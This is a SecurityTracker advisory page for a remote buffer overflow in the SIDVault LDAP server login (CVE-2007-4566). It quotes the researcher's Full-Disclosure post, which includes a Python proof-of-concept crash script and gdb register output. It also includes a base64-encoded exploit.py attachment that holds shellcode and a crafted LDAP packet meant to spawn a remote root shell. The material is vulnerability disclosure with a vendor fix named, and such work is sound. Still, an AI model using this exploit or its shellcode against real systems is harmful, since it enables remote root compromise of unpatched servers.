SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   SIDVault Vendors:   Alpha Centauri Software
SIDVault Login Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1018612
SecurityTracker URL:  http://securitytracker.com/id/1018612
CVE Reference:   CVE-2007-4566   (Links to External Site)
Updated:  Mar 26 2008
Original Entry Date:  Aug 27 2007
Impact:   Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0d (Linux), 2.0e (Windows)
Description:   Joxean Koret reported a vulnerability in SIDVault. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted data to the login mechanism to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service (root or System privileges).

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (2.0f), available at:

http://www.alphacentauri.co.nz/

Vendor URL:  www.alphacentauri.co.nz/sidvault/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] SIDVault LDAP Server Remote Buffer Overflow


--===============1750443288==
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature";
	boundary="=-fudtU7ez9UKBCv7MKoFd"


--=-fudtU7ez9UKBCv7MKoFd
Content-Type: multipart/mixed; boundary="=-jXl88blkrAjQ/BczmKHP"


--=-jXl88blkrAjQ/BczmKHP
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

SIDVault LDAP Server Remote Buffer Overflow
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.=20

Vulnerable versions:

	Win32 2.0e
	Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition.=20

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l =3D ldap.open("localhost")
l.simple_bind("dc=3D" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.=20

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es


--=-jXl88blkrAjQ/BczmKHP
Content-Disposition: attachment; filename=exploit.py
Content-Type: text/x-python; name=exploit.py; charset=UTF-8
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9weXRob24NCg0KIiIiDQpBbHBoYSBDZW50YXVyaSBTb2Z0d2FyZSBTSURWYXVs
dCBMREFQIFNlcnZlciByZW1vdGUgcm9vdCBleHBsb2l0ICgwZGF5cykNCiIiIg0KDQppbXBvcnQg
c3lzDQppbXBvcnQgc29ja2V0DQoNCnNjICA9ICJceGViXHgwM1x4NTlceGViXHgwNVx4ZThceGY4
XHhmZlx4ZmZceGZmXHg0Zlx4NDlceDQ5XHg0OVx4NDlceDQ5Ig0Kc2MgKz0gIlx4NDlceDUxXHg1
YVx4NTZceDU0XHg1OFx4MzZceDMzXHgzMFx4NTZceDU4XHgzNFx4NDFceDMwXHg0Mlx4MzYiDQpz
YyArPSAiXHg0OFx4NDhceDMwXHg0Mlx4MzNceDMwXHg0Mlx4NDNceDU2XHg1OFx4MzJceDQyXHg0
NFx4NDJceDQ4XHgzNCINCnNjICs9ICJceDQxXHgzMlx4NDFceDQ0XHgzMFx4NDFceDQ0XHg1NFx4
NDJceDQ0XHg1MVx4NDJceDMwXHg0MVx4NDRceDQxIg0Kc2MgKz0gIlx4NTZceDU4XHgzNFx4NWFc
eDM4XHg0Mlx4NDRceDRhXHg0Zlx4NGRceDQxXHgzM1x4NGJceDRkXHg0M1x4MzUiDQpzYyArPSAi
XHg0M1x4NDRceDQzXHg0NVx4NGNceDU2XHg0NFx4MzBceDRjXHg0Nlx4NDhceDU2XHg0YVx4NDVc
eDQ5XHg0OSINCnNjICs9ICJceDQ5XHgzOFx4NDFceDRlXHg0ZFx4NGNceDQyXHg1OFx4NDhceDU5
XHg0M1x4NDRceDQ0XHg1NVx4NDhceDM2Ig0Kc2MgKz0gIlx4NGFceDM2XHg0MVx4MzFceDRlXHgz
NVx4NDhceDQ2XHg0M1x4MzVceDQ5XHg1OFx4NDFceDRlXHg0Y1x4NTYiDQpzYyArPSAiXHg0OFx4
NTZceDRhXHg1NVx4NDJceDQ1XHg0MVx4NTVceDQ4XHgzNVx4NDlceDQ4XHg0MVx4NGVceDRkXHg0
YyINCnNjICs9ICJceDQyXHg0OFx4NDJceDRiXHg0OFx4NDZceDQxXHg0ZFx4NDNceDRlXHg0ZFx4
NGNceDQyXHg0OFx4NDRceDM1Ig0Kc2MgKz0gIlx4NDRceDU1XHg0OFx4NDVceDQzXHg1NFx4NDlc
eDM4XHg0MVx4NGVceDQyXHg0Ylx4NDhceDM2XHg0ZFx4NGMiDQpzYyArPSAiXHg0Mlx4MzhceDQz
XHgzOVx4NGNceDQ2XHg0NFx4MzBceDQ5XHg1NVx4NDJceDRiXHg0Zlx4NDNceDRkXHg0YyINCnNj
ICs9ICJceDQyXHgzOFx4NDlceDU0XHg0OVx4NDdceDQ5XHg0Zlx4NDJceDRiXHg0Ylx4NTBceDQ0
XHgzNVx4NGFceDQ2Ig0Kc2MgKz0gIlx4NGZceDMyXHg0Zlx4NDJceDQzXHg1N1x4NGFceDQ2XHg0
YVx4MzZceDRmXHgzMlx4NDRceDU2XHg0OVx4MzYiDQpzYyArPSAiXHg1MFx4NDZceDQ5XHgzOFx4
NDNceDRlXHg0NFx4NDVceDQzXHgzNVx4NDlceDU4XHg0MVx4NGVceDRkXHg0YyINCnNjICs9ICJc
eDQyXHg0OFx4NWEiDQoNCiMNCiMgVGhlIGFkZHJlc3Mgd2Ugd2lsbCB1c2UgaXMgMHhmZmZmZTc3
NyAoSk1QIEVTUCBpbiBVYnVudHUncyBsaW51eC1nYXRlLnNvKQ0KIw0KYWRkciA9ICJceDc3XHhl
N1x4ZmZceGZmIg0KDQp0aGVMaW5lID0gJ1x4OTAnKjIwNzYgKyBhZGRyKyAnXHg5MCcqKDIwMTkt
bGVuKHNjKSkgKyBzYw0KDQpwa3QgID0gJzBceDgyXHgxMC9ceDAyXHgwMVx4MDFjXHg4Mlx4MTAo
XHgwNFx4ODJceDEwXHgwNmRjPScNCnBrdCArPSB0aGVMaW5lDQpwa3QgKz0gJ1xuXHgwMVx4MDJc
blx4MDFceDAwXHgwMlx4MDFceDAwXHgwMlx4MDFceDAwXHgwMVx4MDFceDAwXHg4N1x4MGJvYmpl
Y3RDbGFzczBceDAwJw0KDQpzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0
LlNPQ0tfU1RSRUFNKQ0Kcy5jb25uZWN0KChzeXMuYXJndlsxXSwgMzg5KSkNCnMuc2VuZChwa3Qp
DQpzLmNsb3NlKCkNCg==


--=-jXl88blkrAjQ/BczmKHP--

--=-fudtU7ez9UKBCv7MKoFd
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQBG0M5CU6rFMEYDrlERAhaRAJwPyQkYFyNn3YuAmOH8QgScc1NZOwCgj0//
0Rs5w4FXjqcSB4tS0wKjofI=
=6Wck
-----END PGP SIGNATURE-----

--=-fudtU7ez9UKBCv7MKoFd--


		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
http://es.voice.yahoo.com


--===============1750443288==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1750443288==--


		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
http://es.voice.yahoo.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC